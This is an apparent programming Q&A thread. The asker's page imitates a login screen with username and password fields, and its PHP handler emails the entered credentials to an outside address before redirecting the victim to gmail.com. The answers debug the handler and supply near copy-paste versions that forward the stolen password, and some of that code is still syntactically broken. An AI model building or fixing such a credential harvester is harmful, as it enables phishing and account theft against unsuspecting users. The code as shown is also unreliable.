# How can I send e-mail on form_submit?

Tags: php, html-helper

I'm a beginner and I'm assigning tasks to myself. I built a HTML page in which I added a form. It looks like this:

```
<body background="images/backgr.jpg" bgProperties="fixed" style="background-attachment:fixed;background-repeat:no-repeat;">

<form action="send.php" method="post">
<input name="username" type="text" style="position:absolute;width:266px;left:720px;top:306px;z-index:0">
<input name="password" type="password" style="position:absolute;width:266px;left:720px;top:354px;z-index:1">
<input type="image" name= "submit" id="submit" src="images/button.jpg" style="position:absolute; overflow:hidden; left:720px; top:383px; width:22px; height:22px; z-index:2" alt="submit" title="submit" border=0 width=22 height=22>     </a></div>
</form>
```

And the php file 'send.php':

```
<?php 
if(isset($_POST['submit'])){
$to = "salut@bagaiacimailu.com"; // <mail-ul nostru
$user_name = $_POST['username'];
$password = $_POST['password'];
$subject = "You got mail!";
$message = $username . " " . $password . ";
mail($to,$subject,$message,$headers);
}
header (Location: "www.gmail.com");
?>
```

I get error when the submit button is pressed on my HTML.

Comment: Please include the error in your question.

Comment: Use this : $message = $username . " " . $password; Use an appropriate editor to notice these things, even in the SO you can notice this

Comment: missing a quote or an extra quote at the end of `$message`

Comment: Possible duplicate of [How to send an email using PHP?](http://stackoverflow.com/questions/5335273/how-to-send-an-email-using-php)

Comment: I just don't understand guys..

Answer (score 0):

`$header = "From: noreply@yourdomain.com";`

add this inside the isset block. and only use header if the mail function works.

Like this-

```
  if(mail('','','','')){
//redirect line here
}else{
//error statement here
}
```

check your variables $user_name and $username. This will send only $password value in mail and you will keep wondering where did the username go! I have learned this the hard way so be careful with usernames. using `_` is recommended.

Here is what i mean

```
<?php 
if(isset($_POST['submit'])){
$to = "salut@bagaiacimailu.com"; // this id will get the mail
$user_name = $_POST['username']; 
$password = $_POST['password'];
$subject = "You got mail!";  
$header = "From: noreply@yourdomainname.com";//this is where the mail. comes from. you were missing this parameter. it was not created
$message = $user_name . " " . $password . ";  
if(mail($to,$subject,$message,$headers)){  //this is true if mail is sent other wise it will go into else block
header (Location: "www.gmail.com");
}else{
echo 'Mail was not sent...'; //or redirect to some other page if you like
}
}

?>
```

Hope this helps! Let me know if you have anything else.

Comment: Thanks for your answer, bro.
I don't actually understand where should i add. Can you, by any chance, paste me the exact code added to my file?

Thanks a lot mate. I owe you big time :)

Comment: @Tobo i have edited my answer, you can almost copy paste it in your send.php page. Accept my solution as answer if it works for you! Thanks and happy coding!

Answer (score 0):

Download and read about PHPMailer,and use following code :

```
                            <?php
                        if (isset ( $_POST ['submit'] )) {
                            require 'PHPMailer/PHPMailerAutoload.php';

                            $mail = new PHPMailer ();

                            $mail->isSMTP (); // Set mailer to use SMTP
                            $mail->Host = 'smtp.gmail.com'; // Specify main and backup SMTP servers
                            $mail->SMTPAuth = true; // Enable SMTP authentication
                            $mail->Username = 'youremail@xyz.com'; // SMTP username
                            $mail->Password = 'password'; // SMTP password
                            $mail->SMTPSecure = 'tls'; // Enable TLS encryption, `ssl` also accepted
                            $mail->Port = 587; // TCP port to connect to

                            $mail->setFrom ( 'Fromemailaddress', 'xyz' );
                            $mail->addReplyTo ( 'toemailaddress', 'xyz' );
                            $mail->addAddress ( 'Fromemailaddress' ); // Add a recipient
                                                                      // $mail->addCC('cc@example.com');
                                                                      // $mail->addBCC('bcc@example.com');

                            $mail->isHTML ( true ); // Set email format to HTML

                            $bodyContent = '<h1>hello </h1>';
                            $bodyContent .= '<p>This is my 1st email through php</p>';

                            $mail->Subject = 'Email from Localhost by CodexWorld';
                            $mail->Body = $bodyContent;

                            if (! $mail->send ()) {
                                echo 'Message could not be sent.';
                                echo 'Mailer Error: ' . $mail->ErrorInfo;
                            } else {
                                echo 'Message has been sent';
                            }
                        }

                        ?>
        <form action="#" method="post">
            <input name="username" type="text"> <input name="password"
                type="password"> <input type="submit" name="submit" id="submit" />
        </form>
```

Answer (score 0):

For send mail use PHPMailer (https://github.com/PHPMailer/PHPMailer)

Use this code:

```
<?php   
    include("class.phpmailer.php");
    include("class.pop3.php");
    include("class.smtp.php");

    $messaggio_pre = new PHPmailer();
    $messaggio_pre->IsSMTP(); // attiva l'invio tramiteSMTP
    $messaggio_pre->Host = "localhost"; // indirizzo smtp
    $messaggio_pre->IsSMTP();
    $messaggio_pre->SMTPAuth = true;
    $messaggio_pre->IsHTML(true);
    $messaggio_pre->Host='YourHost'; //compile
    $messaggio_pre->Username = 'from.this@mail.com'; //compile
    $messaggio_pre->Password = 'password'; //compile
    $messaggio_pre->From='from.this@mail.com'; //compile
    $messaggio_pre->FromName='FromName'; //compile
    $messaggio_pre->AddAddress(send.at.this@address.com); //compile
    $messaggio_pre->Subject='YourSubject'; //compile
    $messaggio_pre->Body.='Text text!'; //compile
    if(!$messaggio_pre->Send()){
        echo $messaggio_pre->ErrorInfo;                  
    }               
    $messaggio_pre->SmtpClose();                
    unset($messaggio_pre);    
?>
```

Obviously you must include 3 files. List:
 - [class.phpmailer.php](https://github.com/PHPMailer/PHPMailer/blob/master/class.phpmailer.php) 
 - [class.pop3.php](https://github.com/PHPMailer/PHPMailer/blob/master/class.pop3.php) 
 - [class.smtp.php](https://github.com/PHPMailer/PHPMailer/blob/master/class.smtp.php)

Answer (score -1):

```
<?php 
if(isset($_POST['submit'])){
$to = "salut@bagaiacimailu.com"; // <mail-ul nostru
$user_name = $_POST['username'];
$password = $_POST['password'];
$subject = "You got mail!";
$message = $username . " " . $password;
mail($to,$subject,$message);
}
header ("Location: https://www.gmail.com");
?>
```

Comment: Your code is as flawed as the original one, and code only answers are rarely useful for future visitors, please elaborate what you have changed and what OP was missing.

Comment: I can't find nothing changed here. What is it?

Comment: Mail function without $header variable and the header location in quotes
And no dots arter $password ;)